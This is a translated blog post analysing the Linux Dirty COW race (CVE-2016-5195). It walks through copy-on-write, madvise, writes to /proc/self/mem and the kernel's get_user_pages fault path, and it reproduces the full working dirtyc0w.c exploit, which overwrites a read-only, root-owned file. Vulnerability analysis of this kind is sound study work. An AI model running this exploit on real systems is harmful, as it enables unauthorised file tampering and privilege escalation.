[Original] Linux kernel [CVE-2016-5195] (Dirty COW): how the vulnerability works
Posted: 2020-12-11 18:44 15612
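Environment: Ubuntu 16.04, kernel version 4.15.0-45-generic.
The kernel source is downloaded from the Tsinghua mirror, which is fast.
The build finishes quickly.
The target file initially contains aaaaaa.
After running the PoC the content has been overwritten, so the vulnerability is present.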
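Before going into the details of the vulnerability, a few concepts need to be clear.
P1 and P2 are two processes, and P2 is created by P1 calling fork(). At this point P1 and P2 actually share the same physical pages. A page is copied only when one of them writes to it.
This design rests on two considerations:
1. A child process usually calls one of the exec() family of functions to do its real work. (When a process wants to run another program, and since calling fork is the only way to create a new process, it first calls fork to create a copy of itself, and then one of the copies, usually the child, calls exec to replace itself with the new program. This is the typical pattern for programs such as shells.) A characteristic of the exec family is that, on success, control flow transfers directly to the entry point of the new program (for example, the common glibc pwn technique of hijacking __malloc_hook to reach a one_gadget that calls execve and spawns a shell).
2. fork() really only creates a copy of the parent with a different pid. If the parent's entire data were copied into a new address space for the child at that moment, the copy would be wasted, because the exec functions replace the calling process's address space outright. So the copy has to be optimized away.
This is why the COW (copy-on-write) mechanism exists.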
Suppose there is a process P1 that creates a new process P2, and then P1 modifies page 3.
The figures below show what happens before and after P1 modifies page 3.
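The copy-on-write behaviour described above can be observed from user space. The following is a minimal sketch, not part of the original post: the helper name cow_fork_demo is hypothetical, and it only shows the visible effect (the parent's data stays intact after the child writes), not the page-level mechanics.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: fork, let the child overwrite a buffer, then copy
 * what the parent still sees into parent_view. Returns 0 on success. */
int cow_fork_demo(char *parent_view, size_t n)
{
    assert(parent_view != NULL && n > 0);

    char *buf = malloc(n);
    if (!buf)
        return -1;
    snprintf(buf, n, "parent data");

    pid_t pid = fork();
    if (pid < 0) {
        free(buf);
        return -1;
    }
    if (pid == 0) {
        /* Child: after fork the page is shared; this store makes the
         * kernel give the writer its own copy of the page. */
        snprintf(buf, n, "child data");
        _exit(strcmp(buf, "child data") == 0 ? 0 : 1);
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0) {
        free(buf);
        return -1;
    }
    /* Parent: its view of the buffer was never touched by the child. */
    snprintf(parent_view, n, "%s", buf);
    free(buf);
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

Calling cow_fork_demo(view, sizeof view) from a small main and printing view should show the parent's original string, even though the child wrote to the same virtual address.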
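Prototype: int madvise(void *addr, size_t length, int advice);
It tells the kernel that the user virtual memory in the range starting at addr and spanning length bytes is expected to follow a particular usage pattern.
The options for the advice parameter are listed as follows (the MADV_ACCESS_* values come from the Solaris madvise documentation; the one that matters here is MADV_DONTNEED):
With MADV_DONTNEED, this system call tells the kernel that the memory in addr ~ addr+length will not be used in the near future. The kernel frees that memory to save space, and the corresponding page table entries are cleared.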
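To make the effect of MADV_DONTNEED concrete, here is a small sketch under stated assumptions: it relies on Linux semantics for private anonymous mappings (a discarded page comes back zero-filled on the next access), and the helper name byte_after_dontneed is hypothetical.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: write `value` into a private anonymous page, discard
 * the page with MADV_DONTNEED, and return the byte read back afterwards.
 * Returns -1 on error. */
int byte_after_dontneed(unsigned char value)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0)
        return -1;

    unsigned char *p = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;

    p[0] = value;               /* faults the page in and dirties it */
    assert(p[0] == value);

    if (madvise(p, (size_t)page, MADV_DONTNEED) != 0) {
        munmap(p, (size_t)page);
        return -1;
    }

    int seen = p[0];            /* PTE was cleared: this access faults again */
    munmap(p, (size_t)page);
    return seen;
}
```

On Linux the returned byte is expected to be 0 regardless of the value written, because the kernel threw the old page away and the new fault supplies a fresh one.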
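1. First we create a file foo whose permissions make it read-only.
2. We open it with O_RDONLY, which returns the file descriptor f, and store the status of that descriptor in the st structure (of type struct stat).
3. Next, mmap maps the file's contents into user space as a private copy-on-write mapping. The parameters have the following meaning:
4. Two threads are started: madviseThread and procselfmemThread.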
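Step 3 relies on the guarantee that writes to a MAP_PRIVATE mapping never reach the underlying file. The sketch below illustrates that guarantee under assumptions that differ from the PoC: the mapping is created with PROT_READ | PROT_WRITE so an ordinary store is legal, the scratch file lives under /tmp, and the helper name private_mapping_demo is hypothetical.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: put "AAAA" in a scratch file, map it MAP_PRIVATE,
 * overwrite the mapping with "BBBB", then read the file back.
 * map_view receives what the mapping shows, file_view what the file holds.
 * Returns 0 on success. */
int private_mapping_demo(char map_view[5], char file_view[5])
{
    assert(map_view != NULL && file_view != NULL);

    char path[] = "/tmp/cow_demo_XXXXXX";   /* assumed scratch location */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                           /* file persists until close(fd) */

    int rc = -1;
    if (write(fd, "AAAA", 4) == 4) {
        char *m = mmap(NULL, 4, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
        if (m != MAP_FAILED) {
            memcpy(m, "BBBB", 4);           /* write fault: private copy made */
            memcpy(map_view, m, 4);
            map_view[4] = '\0';
            if (pread(fd, file_view, 4, 0) == 4) {
                file_view[4] = '\0';
                rc = 0;
            }
            munmap(m, 4);
        }
    }
    close(fd);
    return rc;
}
```

The mapping is expected to show BBBB while the file still holds AAAA. Dirty COW is precisely a case where this separation breaks down.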
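procselfmemThread takes as its argument the string we want to write: m0000000.
It first opens /proc/self/mem with O_RDWR (for the current process, /proc/self/mem exposes the process's memory, so writing to this file amounts to modifying the process's memory directly). If you try reading it, however, you will find:
This is because regions that are not correctly mapped cannot be read; a read succeeds only when the file offset falls inside a mapped region. That is why lseek is needed to set the position of the memory write. Its prototype is:
In the PoC the position is set to the address returned by mmap (where the file is mapped). SEEK_SET tells the system that offset is the new read/write position. The thread then performs 100000000 writes in an attempt to change the contents of this memory (which was mapped with read permission only).
madviseThread is simple: it calls madvise 100000000 times to mark the range from the mmap'ed address addr to addr+100 as MADV_DONTNEED.
The two threads run concurrently and race against each other.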
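The lseek plus write pattern on /proc/self/mem can be tried safely on memory the process is already allowed to write. This is a minimal sketch, not the PoC: poke_self and read_at_zero_fails are hypothetical helper names, and the code assumes a Linux system with /proc mounted.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: copy n bytes from src to dst by writing through
 * /proc/self/mem instead of using memcpy. Returns bytes written, or -1. */
ssize_t poke_self(void *dst, const void *src, size_t n)
{
    assert(dst != NULL && src != NULL);

    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return -1;

    ssize_t written = -1;
    /* The file offset is interpreted as a virtual address of this process. */
    if (lseek(fd, (off_t)(uintptr_t)dst, SEEK_SET) != (off_t)-1)
        written = write(fd, src, n);

    close(fd);
    return written;
}

/* Hypothetical helper: a read at offset 0 hits an unmapped address.
 * Returns 1 if the read fails, 0 if it succeeds, -1 if open fails. */
int read_at_zero_fails(void)
{
    int fd = open("/proc/self/mem", O_RDONLY);
    if (fd < 0)
        return -1;
    char c;
    ssize_t r = read(fd, &c, 1);
    close(fd);
    return r < 0;
}
```

With char buf[8] = "aaaaaaa", a call such as poke_self(buf, "m000", 4) should leave buf holding m000aaa, while a plain read from the start of the file fails, which matches the Input/output error seen with cat.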
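After the explanation above, it should be roughly clear what the PoC is doing.
Dirty COW is just what the name says: dirty (a dirty page) plus COW (copy-on-write).
Next we analyze the race in detail.
When write(f,str,strlen(str)) is called, the call chain is as follows: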
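At the bottom, mem_rw is called. The file structure here corresponds to /proc/self/mem, buf is the user-space data to write, count is its size, and ppos is the offset.
It first takes the mm_struct pointer from file->private_data.
mm_struct is defined as follows:
It describes all the information about a process's memory address space on Linux.
Its relationship to task_struct is as follows:
The kernel maintains a task_struct (process descriptor) for every process. task_struct records all of the process's context information, including the memory descriptor mm_struct, whose fields abstract the process's address space.
Adding the vma structure to the picture:
Some of the important fields: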
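mem_rw first allocates a new page and then enters access_remote_vm.
From there the chain is get_user_pages -> __get_user_pages_locked -> __get_user_pages. These calls happen because the write system call uses get_user_pages in the kernel to obtain the memory page it is going to write to.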
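The page lookup happens once per page, because the loop in __access_remote_vm clips each transfer at the next page boundary. The arithmetic can be sketched in user space as follows; the helper names are hypothetical and DEMO_PAGE_SIZE is an assumed 4096-byte page size chosen for illustration.

```c
#include <assert.h>
#include <stddef.h>

#define DEMO_PAGE_SIZE 4096UL   /* assumed page size for this illustration */

/* Hypothetical helper mirroring the clipping in __access_remote_vm:
 * how many bytes of [addr, addr+len) lie in the page containing addr. */
size_t bytes_in_first_page(unsigned long addr, size_t len)
{
    unsigned long offset = addr & (DEMO_PAGE_SIZE - 1);
    size_t room = DEMO_PAGE_SIZE - offset;
    return len < room ? len : room;
}

/* Number of per-page lookups needed to cover the whole range. */
size_t pages_touched(unsigned long addr, size_t len)
{
    size_t lookups = 0;
    while (len > 0) {
        size_t bytes = bytes_in_first_page(addr, len);
        assert(bytes > 0);      /* guarantees forward progress */
        addr += bytes;
        len -= bytes;
        lookups++;
    }
    return lookups;
}
```

For example, a 100-byte write starting 16 bytes before a page boundary is split into a 16-byte piece and an 84-byte piece, so it needs two lookups. The PoC writes a short string at the start of the mapping, so a single page is involved.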
__get_user_pages is as follows:
There are several key points in it.
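The first call to follow_page_mask returns NULL (the memory behind the corresponding page table entry does not grant write access, which conflicts with the access semantics in foll_flags).
faultin_page is then called to handle this.
The call flow is as follows:
When it finishes, the page has been brought in and marked dirty.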
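In handle_pte_fault(), if the faulting page is already present in main memory, the fault was usually caused by a write to a read-only page, and COW (copy-on-write) is required: a new page frame is allocated, the old data is copied into it, and the write then goes to the new frame.
After the second page fault completes, FOLL_WRITE has been cleared, so write permission is no longer required.
In the normal case the kernel then obtains the corresponding page and can write to it directly. That write lands in the mapped memory only and does not affect the file on disk.
However, if madviseThread runs at this moment and marks the mmap'ed range as MADV_DONTNEED (not needed in the near future), the kernel clears the page table entry for the mapped memory (the page is dropped immediately), and the next lookup triggers yet another page fault.
So when the write is retried, a page fault is triggered and do_fault brings the page in again. Because FOLL_WRITE is now 0, there is no longer a conflict with the write semantics as there was the first time, and no COW is performed: the fault simply returns the page that backs the file. The subsequent write therefore goes to that page and is synced to the read-only file, which gives a write beyond the process's privileges.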
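The retry logic described above can be captured in a toy state machine. This is only a model for reasoning about the ordering, not kernel code: the enum names, the function simulate_forced_write and its parameter are all hypothetical, and the real kernel paths are far more involved.

```c
#include <assert.h>
#include <stdbool.h>

enum pte_state { PTE_NONE, PTE_PRIVATE_COPY_RO, PTE_PAGE_CACHE_RO };
enum written_page { WROTE_PRIVATE_COPY, WROTE_PAGE_CACHE };

/* Toy model of the lookup/fault retry loop for a forced write to a
 * read-only MAP_PRIVATE file mapping on a vulnerable kernel.
 * madvise_after_fault: the simulated madvise(MADV_DONTNEED) clears the PTE
 * right after this many faults have been handled (0 = madvise never runs). */
enum written_page simulate_forced_write(int madvise_after_fault)
{
    enum pte_state pte = PTE_NONE;
    bool foll_write = true;
    int faults = 0;

    for (;;) {
        /* Lookup (follow_page_mask in the text): needs a present page, and
         * a writable PTE while FOLL_WRITE is set. No PTE here is writable. */
        if (pte != PTE_NONE && !foll_write)
            return pte == PTE_PRIVATE_COPY_RO ? WROTE_PRIVATE_COPY
                                              : WROTE_PAGE_CACHE;

        /* Fault handling (faultin_page in the text). */
        faults++;
        if (pte == PTE_NONE) {
            /* Write fault: COW copy. Read fault: the file's own page. */
            pte = foll_write ? PTE_PRIVATE_COPY_RO : PTE_PAGE_CACHE_RO;
        } else {
            /* Page present but read-only: COW is already done, so the
             * write requirement is dropped before retrying. */
            assert(pte == PTE_PRIVATE_COPY_RO && foll_write);
            foll_write = false;
        }

        /* The racing thread zaps the PTE at the chosen moment. */
        if (faults == madvise_after_fault)
            pte = PTE_NONE;
    }
}
```

In this model the write lands on the file's page only when the PTE is cleared after the second fault, that is, after FOLL_WRITE has been dropped. Clearing it earlier just repeats the COW, which is why the PoC needs so many iterations to win the race.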
Normal flow:
Vulnerable flow:
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
https://blog.csdn.net/qq_26768741/article/details/54375524
https://www.cnblogs.com/wanpengcoder/p/11761063.html
Analysis of the user-space page fault handler pte_handle_fault(), part 2: copy-on-write
sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz
make bzImage -j4
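MADV_ACCESS_DEFAULT
    This flag resets the kernel's expected access pattern for the specified range to the default.
MADV_ACCESS_LWP
    This flag tells the kernel that the next LWP to touch the specified address range is the LWP that will access the range most often. The kernel allocates memory and other resources for this range and LWP accordingly.
MADV_ACCESS_MANY
    This flag advises the kernel that many processes or LWPs will access the specified address range randomly across the system. The kernel allocates memory and other resources for this range accordingly.
MADV_DONTNEED
    Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it.)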
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
  return NULL;  /* the thread function is declared to return void * */
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
  return NULL;  /* the thread function is declared to return void * */
}

int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}
struct stat64 {
    unsigned long long  st_dev;
    unsigned char       __pad0[4];
    unsigned long       __st_ino;
    unsigned int        st_mode;
    unsigned int        st_nlink;
    unsigned long       st_uid;
    unsigned long       st_gid;
    unsigned long long  st_rdev;
    unsigned char       __pad3[4];
    long long           st_size;
    unsigned long       st_blksize;
    /* Number 512-byte blocks allocated. */
    unsigned long long  st_blocks;
    unsigned long       st_atime;
    unsigned long       st_atime_nsec;
    unsigned long       st_mtime;
    unsigned int        st_mtime_nsec;
    unsigned long       st_ctime;
    unsigned long       st_ctime_nsec;
    unsigned long long  st_ino;
};
map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
// prototype
void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem
cat: /proc/66310/mem: Input/output error
off_t lseek(int fd, off_t offset, int whence);
__get_free_pages+14
mem_rw.isra+69
mem_write+27
__vfs_write+55
vfs_write+169
sys_write+85
static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}
static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)    // write=1
{
    struct mm_struct *mm = file->private_data;
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;

    if (!mm)
        return 0;

    page = (char *)__get_free_page(GFP_TEMPORARY);    // allocate one free page as a bounce buffer and return a pointer to it (the page is not zeroed)
    if (!page)
        return -ENOMEM;

    copied = 0;
    if (!atomic_inc_not_zero(&mm->mm_users))    // atomic_inc_not_zero(v) increments the atomic_t *v only if it is currently non-zero and returns true if it did; here it takes a reference on mm->mm_users
        goto free;    // the count was already 0, so just free the page

    while (count > 0) {    // loop while there are bytes left
        int this_len = min_t(int, count, PAGE_SIZE);    // the smaller of count and PAGE_SIZE, compared as int

        if (write && copy_from_user(page, buf, this_len)) {    // copy this_len bytes from buf into the newly allocated page
            copied = -EFAULT;
            break;
        }

        this_len = access_remote_vm(mm, addr, page, this_len, write);    // write=1
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }

        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }

        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;

    mmput(mm);
free:
    free_page((unsigned long) page);    // free the page allocated above
    return copied;
}
struct mm_struct {
    // head of the linked list of memory region (VMA) objects
    struct vm_area_struct * mmap;        /* list of VMAs */
    // red-black tree of memory region objects
    struct rb_root mm_rb;
    // most recently found memory region
    struct vm_area_struct * mmap_cache;  /* last find_vma result */
    // function used to search the process address space for a usable range
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
    unsigned long (*get_unmapped_exec_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
    // method called when a memory region is released
    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);
    // linear address of the first allocated file memory mapping
    unsigned long mmap_base;        /* base of mmap area */
    unsigned long task_size;        /* size of task vm space */
    /*
     * RHEL6 special for bug 790921: this same variable can mean
     * two different things. If sysctl_unmap_area_factor is zero,
     * this means the largest hole below free_area_cache. If the
     * sysctl is set to a positive value, this variable is used
     * to count how much memory has been munmapped from this process
     * since the last time free_area_cache was reset back to mmap_base.
     * This is ugly, but necessary to preserve kABI.
     */
    unsigned long cached_hole_size;
    // where the kernel starts searching for free linear address space in the process
    unsigned long free_area_cache;  /* first hole of size cached_hole_size or larger */
    // pointer to the page directory
    pgd_t * pgd;
    // number of users sharing this address space
    atomic_t mm_users;      /* How many users with user space? */
    // primary usage counter of the memory descriptor; it is a reference count, and 0 means nobody uses it any more
    atomic_t mm_count;      /* How many references to "struct mm_struct" (users count as 1) */
    // number of memory regions
    int map_count;          /* number of VMAs */
    struct rw_semaphore mmap_sem;
    // lock protecting the task's page tables and reference counters
    spinlock_t page_table_lock;    /* Protects page tables and some counters */
    // list of mm_struct structures; the first member is the initial mm_struct
    struct list_head mmlist;    /* List of maybe swapped mm's. These are globally strung
                                 * together off init_mm.mmlist, and are protected
                                 * by mmlist_lock
                                 */
    /* Special counters, in some configurations protected by the
     * page_table_lock, in other configurations by being atomic.
     */
    mm_counter_t _file_rss;
    mm_counter_t _anon_rss;
    mm_counter_t _swap_usage;
    // peak number of resident pages owned by the process
    unsigned long hiwater_rss;    /* High-watermark of RSS usage */
    // peak number of pages in the process's memory regions
    unsigned long hiwater_vm;     /* High-water virtual memory usage */
    // size of the process address space, number of locked pages that cannot be swapped, pages in shared file mappings, pages in executable mappings
    unsigned long total_vm, locked_vm, shared_vm, exec_vm;
    // number of pages in the user-mode stack
    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
    // bounds of the code segment and the data segment
    unsigned long start_code, end_code, start_data, end_data;
    // bounds of the heap and the stack
    unsigned long start_brk, brk, start_stack;
    // start and end addresses of the command-line arguments and of the environment variables
    unsigned long arg_start, arg_end, env_start, env_end;
    unsigned long saved_auxv[AT_VECTOR_SIZE];    /* for /proc/PID/auxv */
    struct linux_binfmt *binfmt;
    cpumask_t cpu_vm_mask;
    /* Architecture-specific MM context */
    mm_context_t context;
    /* Swap token stuff */
    /*
     * Last value of global fault stamp as seen by this process.
     * In other words, this value gives an indication of how long
     * it has been since this task got the token.
     * Look at mm/thrash.c
     */
    unsigned int faultstamp;
    unsigned int token_priority;
    unsigned int last_interval;
    // default access flags of the memory regions
    unsigned long flags;    /* Must use atomic bitops to access the bits */
    struct core_state *core_state;    /* coredumping support */
#ifdef CONFIG_AIO
    spinlock_t ioctx_lock;
    struct hlist_head ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
    /*
     * "owner" points to a task that is regarded as the canonical
     * user/owner of this mm. All of the following must be true in
     * order for it to be changed:
     *
     * current == mm->owner
     * current->mm != mm
     * new_owner->mm == mm
     * new_owner->alloc_lock is held
     */
    struct task_struct *owner;
#endif
#ifdef CONFIG_PROC_FS
    /* store ref to file /proc/<pid>/exe symlink points to */
    struct file *exe_file;
    unsigned long num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
    struct mmu_notifier_mm *mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
    pgtable_t pmd_huge_pte;    /* protected by page_table_lock */
#endif
    /* reserved for Red Hat */
#ifdef __GENKSYMS__
    unsigned long rh_reserved[2];
#else
    /* How many tasks sharing this mm are OOM_DISABLE */
    union {
        unsigned long rh_reserved_aux;
        atomic_t oom_disable_count;
    };
    /* base of lib map area (ASCII armour) */
    unsigned long shlib_base;
#endif
};
/**
 * access_remote_vm - access another process' address space
 * @mm:     the mm_struct of the target address space
 * @addr:   start address to access
 * @buf:    source or destination buffer
 * @len:    number of bytes to transfer
 * @write:  whether the access is a write
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}
/*
 * Access another process' address space as given in mm.  If non-NULL, use the
 * given task for page fault accounting.
 */
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long addr, void *buf, int len, int write)
{
    struct vm_area_struct *vma;
    void *old_buf = buf;

    down_read(&mm->mmap_sem);
    /* ignore errors, just check how much was successfully transferred */
    while (len) {
        int bytes, ret, offset;
        void *maddr;
        struct page *page = NULL;

        ret = get_user_pages(tsk, mm, addr, 1,
                write, 1, &page, &vma);
        if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
            break;
#else
            /*
             * Check if this is a VM_IO | VM_PFNMAP VMA, which
             * we can access using slightly different code.
             */
            vma = find_vma(mm, addr);
            if (!vma || vma->vm_start > addr)
                break;
            if (vma->vm_ops && vma->vm_ops->access)
                ret = vma->vm_ops->access(vma, addr, buf,
                              len, write);
            if (ret <= 0)
                break;
            bytes = ret;
#endif
        } else {
            bytes = len;
            offset = addr & (PAGE_SIZE-1);
            if (bytes > PAGE_SIZE-offset)
                bytes = PAGE_SIZE-offset;

            maddr = kmap(page);
            if (write) {
                copy_to_user_page(vma, page, addr,
                          maddr + offset, buf, bytes);
                set_page_dirty_lock(page);
            } else {
                copy_from_user_page(vma, page, addr,
                            buf, maddr + offset, bytes);
            }
            kunmap(page);
            page_cache_release(page);
        }
        len -= bytes;
        buf += bytes;
        addr += bytes;
    }
    up_read(&mm->mmap_sem);

    return buf - old_buf;
}